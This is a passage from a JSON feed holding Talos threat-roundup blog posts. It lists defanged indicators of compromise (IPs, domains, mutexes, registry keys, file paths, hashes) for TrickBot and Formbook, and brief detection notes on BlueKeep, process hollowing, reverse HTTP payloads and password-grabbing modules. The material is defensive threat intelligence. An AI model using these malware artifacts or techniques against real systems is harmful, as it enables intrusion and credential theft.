2 \n`95[.]143[.]141[.]50` | 2 \n`68[.]55[.]59[.]145` | 2 \n`188[.]255[.]239[.]34` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`icanhazip[.]com` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\tywy22.txt` | 24 \n`%TEMP%\\tywyaven.exe` | 24 \n`%TEMP%\\t4930.tmp` | 1 \n`%TEMP%\\vimazet.exe` | 1 \n \n#### File Hashes\n\n` 01152de6c7c348fa9716c3d760744689eb85386303593e6100f6532bd3fc2cb3 01cb3cbad05c3b0b186b604f32cb00a3ceced74ead26affe5b4fb1867d48be01 02f4933753d850d1774b56cbd35c994b6b7dd9b971fd45c34f5677f90b281b6a 062720c82d1bef7558b0a4675b9539a23afddf252ede24b5d54edfba2a758ca5 06f92e4b684161224f68388d8d4ca35d113682fadeb2e100072dfa8d43413101 09589d82d2f9460fe3d33b726794d41a93b672dbaed8e5f397350b7714649cd7 09f38837949bbee74dd5da5fce7a92d7f21168f7e43345bbd19f5cbfde8f6f69 0c45c58eab16df4d5bff14dad957f91d5785a09836560bc3bd681c27e012b1b8 0d774c5ac17521abec32a11e81317fed5f7c163d82ec7f9e1065c86834458cfe 0d90667089d17e2924b00e5207a357156e9076dfa3dab3f2e7dc5737135053a9 0e36b813e84b27ff1c1b770fffbf4175c7c39bbe499804c9c27565ed4a9518fa 0fa25c7c007f337ab5ba699a2611c47ff41a8ba74cb83fa1ffde097e7408f8ed 10c863059e4910501e1deea44279a5402e93796098230511c65be09f8f47eb82 1356d0345699b8766d5c8de5d61cb47fd63dc3f42fe2280a2c413a8d7f97c1c8 13f7895a32eb09a5016a408819dce9c95a4149888ad708c0232e0659e2ca06e3 14178c54d283e6579242e90df7c4dae8af71ff4594c834e3cc7a275588f561b7 14e727de9a56e79b9dcaf48cc9751d4cb447f16d839d705c628640857d0e6e13 1535d470effa0af601719b9ef64e615f321e4db52ee4b7bb05def6d501884fbc 16b232d226ca18447e1f1671538607fe5be412e935b930bcde73ff46e0b2890f 186a59f2954d3d213a26308386be80f2b503e08882324ab559490330700fc24a 1d2374db5ee92385e49fbaef9ef694361877cdffa4b51d8fd8d37e6272dfad57 1e1bdd6ddb3c256c79024eccdb2de6b0861a2a86e13f3f03cf1f378e2cdc9d36 1fcbef293371203729eca2c9491641a03b2330c9be11b438f84db0e996e5b78c 2119922518bc437c7d5fd7d7205929089a9ed9333cdff97bb214808f37e86dd7 211bdc6613fc3e691ac70d215a8a9edd5f0ebb85bb4f24d6e293fb21894a0b1b `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Mn9zktFrhm0/XhjdGEPVDEI/AAAAAAAADGg/3oyOPAaQw2ERguOdIwbsRP6QPpF9bWjkgCLcBGAsYHQ/s1600/2119922518bc437c7d5fd7d7205929089a9ed9333cdff97bb214808f37e86dd7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-9-Dz5v-Cwb0/XhjdJ5fMG5I/AAAAAAAADGk/M-zT2WDcOe0dvfCWXd_rw9yz0newX7v8gCLcBGAsYHQ/s1600/2119922518bc437c7d5fd7d7205929089a9ed9333cdff97bb214808f37e86dd7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.TrickBot-7490964-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: RefCount ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 22 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`181[.]113[.]28[.]146` | 5 \n`188[.]120[.]254[.]68` | 5 \n`195[.]123[.]220[.]178` | 5 \n`198[.]23[.]209[.]201` | 4 \n`104[.]20[.]17[.]242` | 3 \n`119[.]252[.]165[.]75` | 3 \n`78[.]24[.]223[.]88` | 3 \n`188[.]165[.]62[.]34` | 3 \n`164[.]68[.]120[.]60` | 3 \n`69[.]195[.]159[.]158` | 2 \n`190[.]214[.]13[.]2` | 2 \n`5[.]2[.]70[.]145` | 2 \n`185[.]213[.]20[.]246` | 2 \n`185[.]141[.]27[.]190` | 2 \n`185[.]177[.]59[.]163` | 2 \n`216[.]239[.]38[.]21` | 1 \n`200[.]21[.]51[.]38` | 1 \n`200[.]127[.]121[.]99` | 1 \n`181[.]129[.]104[.]139` | 1 \n`18[.]213[.]79[.]189` | 1 \n`45[.]125[.]1[.]34` | 1 \n`23[.]20[.]220[.]174` | 1 \n`45[.]137[.]151[.]198` | 1 \n`5[.]182[.]210[.]109` | 1 \n`51[.]89[.]115[.]124` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`icanhazip[.]com` | 3 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 2 \n`checkip[.]amazonaws[.]com` | 2 \n`wtfismyip[.]com` | 2 \n`api[.]ip[.]sb` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\System Network Extensions` | 22 \n`%APPDATA%\\adirecttools` | 22 \n`%APPDATA%\\adirecttools\\data` | 22 \n`%APPDATA%\\adirecttools\\settings.ini` | 22 \n`%APPDATA%\\ADIRECTTOOLS\\<original file name>.exe` | 22 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 21 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 21 \n`%APPDATA%\\adirecttools\\Data\\pwgrab64` | 1 \n`%APPDATA%\\adirecttools\\data\\pwgrab64_configs\\dpost` | 1 \n`%APPDATA%\\adirecttools\\69ab1bb7084669cf84cc43537b700264.exe` | 1 \n`%SystemRoot%\\TEMP\\~DF8EC46E2629511EB8.TMP` | 1 \n`%APPDATA%\\adirecttools\\runme.exe` | 1 \n`%SystemRoot%\\TEMP\\~DF5EC233074AA93A3C.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF4BEDA5BB57A455AF.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DFCE2B4CA7595FDB1F.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF771B5AE6CE965D7A.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF21C4C13A90F8FECB.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF2EDE8F31D379304B.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF887620F0BF482816.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF6B5F6A59497674CC.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DFA8D4CB1355CC2A5F.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF326643DA3623EF2B.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF2334856A166D2B71.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DF862A67F04082D9B3.TMP` | 1 \n`%SystemRoot%\\TEMP\\~DFC53480C7F7651844.TMP` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0245c1658f2c7d9989431954aeeae75907cd70d94d45137c6d03d1c77463779f 11a8ffc0df227cb681971a11904bf83d3a72a52aefd1335df4202115ccabe4a1 17db3888319bac8bdc2fa0c33c3125dca7f8b2f9ff39dfe8b16882c3babd5273 26e223b88abca88510d861698e8468675e7fc8fac1199a554d4fdd2cff91197d 4517232ad858b209e6a6fb873e2a8665a85c91506b1ded4c518e751fc7adacb2 65371d42ff1b2db3b211c5f180f411a2621679225dab602ed0d47a496287ff4c 691f1b9988bde02160172a8ed8d0e242cc25d8fd205839887140330ebff862f5 6b4f93bb3fc3aeb71591f7fd237367905898b62f3a08580d8ed691fa06f6734d 6e2ab21ca9e1bb545bee1a66190cd9786d9d2d376b47864715b121ed8ccb3d33 7055bef3d19a836529109b5037e4ce63e9f3c8d8f9e5b8daba57880b9ca5cb5e 7996ea4f4f2a2d9e2152eaefba2fc9077c33fc5a1848b2ec4e6a69e54ef7fba3 82aef9ea980b0fd2fb268be8fc8ebdf14b9150df5c167aa29ddcd464afc2014c 8d9c8ef971a707651456e085f7420e45463d77dbefeab733d381685500f4a027 9363001b83b189a7ebdefcebe844bbbe29e1db03e49fa642bc9530f345d65283 9971b48ee31acc1d33d3a28b3527f3039c5a633d0f0cb6b3422d3b1d219221f0 9e1d70348303b0480a64a03d82b2d011d1a51a5f106024e670f12acc64478b44 a6068b4a752629e61dff03d86cf8bf9141f52e22a8267c0de469fe5d2e5b65de ae0e55999d7f5ae1be0a7132b2e972fc04c95c653f214f3f59ce30fc4e2f57af b4c41107cda5716a098e22be19101e15e3e577e3d6cc8570a4e81e0f6cf24ae1 c693ddb405dcc6831f489f499ece83aae83d27226694bfc390b5059f0849bc2e e0d95256f1587f75b9e0e632e92b88561d4441cb559d7b3944e3152669a28f92 ea15e0fd9d3c825cd2c2217ab150fb7cee86cf5b0a3e411c6c621084199bbb10 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-j8lSMaSSmnM/XhjdaOv8yMI/AAAAAAAADGw/2g6HdPtnEn0zqakL7AfaJ3IkwMX1k9b8QCLcBGAsYHQ/s1600/26e223b88abca88510d861698e8468675e7fc8fac1199a554d4fdd2cff91197d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-tgyCpFzXjYc/XhjdhTDr-GI/AAAAAAAADG0/Q6zNLsnlYbEdg8U0Ik-snUyGQiiSOZ1vgCLcBGAsYHQ/s1600/4517232ad858b209e6a6fb873e2a8665a85c91506b1ded4c518e751fc7adacb2_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Formbook-7491272-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\INTELLIFORMS\\STORAGE2 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000001 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000002 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000003 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\0A0D020000000000C000000000000046 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\13DBB0C8AA05101A9BB000AA002FC45A ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\33FD244257221B4AA4A1D9E6CACF8474 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\3517490D76624C419A828607E2A54604 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\4C8F4917D8AB2943A2B2D4227B0585BF ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\5309EDC19DC6C14CBAD5BA06BDBDABD9 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\82FA2A40D311B5469A626349C16CE09B ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\8503020000000000C000000000000046 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9207F3E0A3B11019908B08002B2A56C2 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9E71065376EE7F459F30EA2534981B83 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\A88F7DCF2E30234E8288283D75A65EFB ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\C02EBC5353D9CD11975200AA004AE40E ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\D33FC3B19A738142B2FC0C56BD56AD8C ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\DDB0922FC50B8D42BE5A821EDE840761 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\DF18513432D1694F96E6423201804111 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\ECD15244C3E90A4FBD0588A41AB27C55 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\F86ED2903A4A11CFB57E524153480001 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\{D9734F19-8CFB-411D-BC59-833E334FCB5E} ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\\CALENDAR SUMMARY ` | 27 \nMutexes | Occurrences \n---|--- \n`8-3503835SZBFHHZ` | 29 \n`Startup_shellcode_006` | 29 \n`KN7MSAA2BUECxyHz` | 29 \n`S-1-5-21-2580483-10603632762720` | 21 \n`S-1-5-21-2580483-2008626601611` | 2 \n`S-1-5-21-2580483-1148626601611` | 1 \n`S-1-5-21-2580483-1464626601611` | 1 \n`S-1-5-21-2580483-2116626601611` | 1 \n`S-1-5-21-2580483-1392626601611` | 1 \n`S-1-5-21-2580483-1992626601611` | 1 \n`S-1-5-21-2580483-1380626601611` | 1 \n`S-1-5-21-2580483-584626601611` | 1 \n`S-1-5-21-2580483-1120626601611` | 1 \n`S-1-5-21-2580483-2100626601611` | 1 \n`S-1-5-21-2580483-1616626601611` | 1 \n`S-1-5-21-2580483-1012626601611` | 1 \n`S-1-5-21-2580483-972626601611` | 1 \n`S-1-5-21-2580483-1440626601611` | 1 \n`S-1-5-21-2580483-1460626601611` | 1 \n`S-1-5-21-2580483-956626601611` | 1 \n`S-1-5-21-2580483-1808626601611` | 1 \n`S-1-5-21-2580483-888626601611` | 1 \n`S-1-5-21-2580483-10203632762720` | 1 \n`S-1-5-21-2580483-2036626601611` | 1 \n`S-1-5-21-2580483-10843632762720` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`162[.]213[.]250[.]169` | 10 \n`173[.]0[.]50[.]210` | 6 \n`217[.]160[.]0[.]55` | 4 \n`192[.]155[.]190[.]84` | 3 \n`172[.]247[.]92[.]19` | 3 \n`199[.]59[.]136[.]230` | 3 \n`184[.]168[.]221[.]32` | 2 \n`198[.]54[.]117[.]216` | 2 \n`198[.]54[.]117[.]211` | 2 \n`23[.]20[.]239[.]12` | 2 \n`184[.]168[.]131[.]241` | 2 \n`217[.]160[.]0[.]154` | 2 \n`74[.]208[.]236[.]114` | 2 \n`199[.]59[.]138[.]230` | 2 \n`74[.]117[.]219[.]198` | 2 \n`198[.]54[.]117[.]218` | 1 \n`198[.]54[.]117[.]212` | 1 \n`198[.]54[.]117[.]215` | 1 \n`184[.]168[.]221[.]36` | 1 \n`185[.]230[.]60[.]195` | 1 \n`85[.]159[.]66[.]62` | 1 \n`97[.]74[.]42[.]79` | 1 \n`172[.]217[.]5[.]243` | 1 \n`208[.]100[.]26[.]245` | 1 \n`3[.]234[.]181[.]234` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]allixanes[.]com` | 10 \n`www[.]travelcards[.]site` | 6 \n`www[.]orlandohouston[.]com` | 5 \n`www[.]xn--4qw729d[.]com` | 5 \n`www[.]davekachman[.]com` | 5 \n`www[.]iqama[.]info` | 5 \n`www[.]reserveforcespolicy[.]com` | 5 \n`www[.]enjoquotes[.]com` | 4 \n`www[.]online-rfs-billing[.]info` | 4 \n`www[.]imtrainee[.]net` | 4 \n`www[.]ildolce[.]store` | 4 \n`www[.]elgranretodeseve[.]com` | 4 \n`www[.]arnaud4k[.]com` | 4 \n`www[.]digital-spot[.]net` | 4 \n`www[.]casalukre-co[.]com` | 3 \n`www[.]jingrunxuan[.]com` | 3 \n`www[.]hzwhedu[.]com` | 3 \n`www[.]zxhckj[.]com` | 3 \n`www[.]thehouseofthedrone[.]com` | 3 \n`www[.]24hourautolocksmith[.]company` | 3 \n`www[.]kingofthenorth[.]tech` | 3 \n`www[.]aurora-health-ua[.]com` | 3 \n`www[.]prokat[.]site` | 3 \n`www[.]riicko[.]com` | 3 \n`www[.]hugedomains[.]com` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\HJdyTuap.exe` | 29 \n`%APPDATA%\\KN7MSAA2` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7log.ini` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7logrc.ini` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7logri.ini` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7logim.jpeg` | 26 \n`%APPDATA%\\KN7MSAA2\\KN7logrv.ini` | 26 \n`%ProgramFiles(x86)%\\Ygl8drb` | 1 \n`%ProgramFiles(x86)%\\Ygl8drb\\config9rs4ano.exe` | 1 \n`%TEMP%\\Ygl8drb` | 1 \n`%TEMP%\\Ygl8drb\\config9rs4ano.exe` | 1 \n`%ProgramFiles(x86)%\\Ymnlhitch` | 1 \n`%ProgramFiles(x86)%\\Ymnlhitch\\helpcfsd4ho.exe` | 1 \n`%TEMP%\\Ymnlhitch` | 1 \n`%TEMP%\\Ymnlhitch\\helpcfsd4ho.exe` | 1 \n`%ProgramFiles(x86)%\\Kpfyl` | 1 \n`%ProgramFiles(x86)%\\Kpfyl\\helpex9l_rep.exe` | 1 \n`%TEMP%\\Kpfyl` | 1 \n`%TEMP%\\Kpfyl\\helpex9l_rep.exe` | 1 \n`%ProgramFiles(x86)%\\Gbbcdufw` | 1 \n`%ProgramFiles(x86)%\\Gbbcdufw\\vgaxjwtjt.exe` | 1 \n`%TEMP%\\Gbbcdufw` | 1 \n`%TEMP%\\Gbbcdufw\\vgaxjwtjt.exe` | 1 \n`%ProgramFiles(x86)%\\L1b6h` | 1 \n`%ProgramFiles(x86)%\\L1b6h\\systrayybihc.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0146d4a89836ecc12759c33a85d60c3867a35b7ee468041fb26b0610ef76e54f 046bebb1052d11ee3db2b5c8cbf3e2f1dd509a2aa73e53f4ffb18d39985165cf 049fa135806899faa44ce50ba918331d0ea0aeb8aa6db5012117bfc794f57759 058392f97319e50bbd2172ab46255c892e12ee0b7948e6ce0420012eb85e7e35 07387a7c05fcaf63b03673bd92d634fcd13e1784fb6adcc6c2b8cf7154c07e55 07c11047e72c8f52c1f5c422fc5b7ed49225259012c813c2bc5a8827bcf5f752 0d49120f2ce8cc77ea769c79a1ab5c7669cb58c07de1a95f08549d2665529df1 0d8e415c487a6ced2680bcb31834fe282b914f09ac167dfb4f1685af0b529c35 0da9443c8aacb9e4757b81deeaeedc7b96766020522ed9992d7b9ce3e0eb5130 0de2930e0fd1d971aa98b219ce6dc3f36b07d8441b7abd0d663a63dd77cfbf37 163d07cf0a756800c6ce5be998331fdffa75081f5f669bbb6149eb0e89744043 1c64787e6ef766f7d9b8cc99deb128d45b89d02accacb3dac1e2ad076f5139eb 208a5ebc7af4b8d15e157e9115f4617a2b3e021a868367b3e7bb0bde69170911 2655a1ee89ed4101f552ce1b75b9d711ee5c6217e63cf6ce8e23086844c839e9 2a13033c3b6b7299bd795ce5c34bbba17a8de80d4d957e4d547ef1ae2ba728b4 2e98ffc7f5bab8e3f2085beba2ecc912f038c9a66a5f6b9ec7d8e0f2eca2fcbc 2fb1d73ee16fea837612ff0d9c89a934e5520310f9a06397f7e2c1a0c1604694 30545b09c38a284d95310d71822427e0bc0b69dcaeb3d316f2fe39decfb8c006 3064e41052d6dfa7c354a6e8c405ae2c1d09e48fa9e82dc4e8faee1f4bebdd4d 352c218b502f9db9eb8a56d8d6515c3fbe51298e29fe3878731a037885dc7f7b 356aa1a0e39cd24ed61ca8c1d6658a91c9dd8dbd2663ce90b5db2b793fe12e01 36fd577a0a6354cae84ff7a6bc3b21159f24cd0b8eff3482ba7c8278b4a89b27 3a14a285394c39842beaf312d02de42ab02c679e47cb6a40c3b900f196ba4e2d 3aa7710feab8dd35997e03ad650a5bae2f19de1d82e2a7fef032815d946e21ee 3d2f8ca93b256a27067969eda8d4fca7559e38b8af59a79c40c40c55f06b53d2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-RA9_xnQV9F0/Xhjd0Mb1XQI/AAAAAAAADHA/hrVyQg73cnMOUokXZJMo0t0qDtc5eVyewCLcBGAsYHQ/s1600/058392f97319e50bbd2172ab46255c892e12ee0b7948e6ce0420012eb85e7e35_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ZAlk35HSJXQ/Xhjd_N1vrqI/AAAAAAAADHE/zkTyBAHh91UyJ00xgFzak1TIkKC_lk99gCLcBGAsYHQ/s1600/b59c555a9fb25b3a79b032de69b9bbe139e690b24a9932a8d994e97cd6d1c717_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-7cLfrrKNMm4/XhjesLzfyTI/AAAAAAAADHQ/2tURBJZ287cdWD5Y3STnHZrc7HTI-Yj2gCLcBGAsYHQ/s1600/9a3a60c34d4b618657bfabc843bfad0e944800e7587446a3786a85f96c16f45a_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (17518) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (353) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (269) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (158) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (90) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (88) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nExcessively long PowerShell command detected \\- (87) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nCorebot malware detected \\- (23) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \nReverse http payload detected \\- (19) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nFusion adware detected \\- (11) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "modified": "2020-01-10T13:41:18", "published": "2020-01-10T13:41:18", "id": "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3Oy-ebGe3yQ/threat-roundup-0103-0110.html", "type": "talosblog", "title": "Threat Roundup for January 3 to January 10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-04T17:31:33", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 27 and Oct. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d9760d0b0164.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Zusy-7191579-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and 